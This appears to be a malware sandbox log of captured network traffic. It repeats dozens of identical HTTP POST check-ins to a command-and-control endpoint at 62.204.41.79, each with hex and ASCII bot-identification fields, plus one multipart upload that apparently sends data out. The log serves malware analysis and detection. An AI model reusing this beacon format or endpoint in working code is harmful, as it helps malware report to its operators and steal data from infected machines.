Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
